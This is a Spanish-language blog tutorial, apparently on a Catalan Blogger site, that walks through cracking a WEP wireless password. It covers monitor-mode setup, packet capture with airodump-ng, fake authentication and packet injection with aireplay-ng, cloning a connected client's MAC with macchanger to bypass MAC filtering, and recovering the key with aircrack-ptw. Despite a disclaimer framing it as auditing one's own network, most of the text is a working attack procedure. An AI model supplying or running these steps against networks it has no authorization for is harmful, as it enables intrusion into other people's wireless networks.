Vamos a comprobar la seguridad denuestra red inalámbrica. Lo que publico es siempre con un findidáctico para que cada uno compruebe la seguridad de su propia redinalámbrica. No me hago responsable del uso ilegítimo de losconocimientos aquí expuestos.
Para realizar esta tarea, vamos autilizar una tarjeta inalámbrica: LEVEL ONE wnc-0301usb V3, queincorpora un chipser de RALINK RT2528L, y tambien una distribuciondestinada a la auditoría inalámbrica. WIFIWAY, WIFISLAX, BACKTRACK.
PUNTO1. CONFIGURACION DE LA TARJETA INALÁMBRICA
Primero tenemos que saber si está o no conectada a nuestro equipo:
# lsusb
debe aparecer mas o menos lo siguiente:
Bus 003 Device 001: ID 0000:0000
Bus 002 Device 001: ID 0000:0000
Bus 001 Device 004: ID 148f:2573 RalinkTechnology, Corp.
Bus 001 Device 001: ID 0000:0000
Ahora vamos a montar el módulo que necesitamos para hacerla funcionar.
#modprobe rt73
ahora con la siguiente orden sabremos si ha montado el módulo o no:
#lsmod
y aparecerá el módulo rt73 en la lista.
Si tenemos problemas al tratar desmontarlo, es fácil que tengamos que desmontar algún módulo que cause conflicto. Para ello:
#modprobe -r
El siguiente paso consiste en montar el interfaz inalámbrico. La rt73 se monta como rausb0
#ifconfig rausb0 up
Lo preparamos para la auditoria:
#iwconfig rausb0 mode Monitor
Si este último paso nos da error,hacemos lo siguiente:
#ifconfig rausb0 down -desmontamos el dispositivo
#iwconfig rausb0 mode Monitor -lo montamos como modo monitor
#ifconfig rausb0 up -montamos el dispositivo
PUNTO2. COMENZAMOS LA AUDITORIA
Vamos a trabajar con varios programas
1- Airodump-ng
Airodump-ng es un programa destinado para captar paquetes encriptados, su funcionamiento es muy sencillo. Este programa debe ser el primero que hagamos trabajar, y que una vez lanzado, no debería detenerse.
Sintaxis:
#airodump-ng
*
Opciones:
o
--bssid: Especificar la MAC del punto de acceso “chequeado”
o
--channel: Especificamos el canal de rastreo
o
-w
*
Dispositivo
o
especificamos el dispositivo inalámbrico: rausb0, wlan0, eth0 etc...
ahora viene la práctica:
1º,ejecutamos airodump sin especificar ninguna opcion:
#airodump-ng rausb0
2º,ahora comenzamos a especificar más detalles:
#airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel n -w aquí rausb0
entonces los Beacons, empiezan a subir y #Data tambien debería, pero si lo hace, lo hará muy lento.
Dejamos pués este programa lanzado, y nos vamos ahora a otro terminal, vamos a comenzar con las autentificaciones
2- Aireplay-ng
Este programa nos permite atacar los routers de distintos modos. Sintaxis:
#aireplay-ng
*
Opciones:
o
modos de ataque
+
-1 (autentificacion)
+
-3 (inyeccion)
o
MAC
+
-a MAC del punto de acceso
+
-b MAC del punto de acceso en inyeccion
+
-h MAC local
+
-e Essid del punto de acceso
*
Dispositivo inalámbrico pertinente
Vamoscon el ejemplo para entenderlo mejor:
1ºla autentificacion:
#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h kk:kk:kk:kk:kk:kk -e WLAN_XX rausb0
con esta orden:
o
(-1) significa que tratamos de autentificarnos
o
( 0) sólo lo haremos una vez
o
(-a) especificamos que queremos autentificarnos con el router que tiene la MAC especificada
o
(-h) especificamos que la autentificacion y asociacion se realizara con la MAC de mi tarjeta (para conocer la mac ifconfig)
o
(-e) tambien especificamos la essid del punto de acceso
o
rausb0, especificamos el adaptador inalámbrico
Con esto, nos asociamos y autentificamos con el router.
Esprobable que el router no nos deje asociarnos. Esto suele ser debido a que tiene un filtrado de MAC, es decir, solo puede conectarse a élla MAC que el tiene configuradas, o que el router no soporte este tipo de ataque.
Sitiene un filtrado de mac, hay que ver, qué otros clientes están asociados en el router, algo que aparece en airodump-ng en la parte inferior, clonar esa mac y comenzar otra vez
#macchanger -m
con esta orden cambiamos la mac del dispositivo inalámbrico
2º Inyeccion
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h kk:kk:kk:kk:kk:kk -e WLAN_XX rausb0
y comenzará a inyectar paquetes al router.
PUNTO3. DESENCRIPTACION
Cuando en #Data aparecen unos 100,000, ya podemos comenzar a desencriptar la contraseña. Para ello empleamos un comando llamado aircrack
sintaxis:
#aircrack-ptw
ejemplo
siantes habiamos especificado en airodump, que el archivo donde seguardarian los paquetes se llamaría “aquí”, entonces:
#aircrack-ptw /root/aqui-01.cap
y al cabo de un tiempo nos dará la contraseña hexadecimal.
Espero que eso os soluciones algún problema.
Cap comentari:
Publica un comentari a l'entrada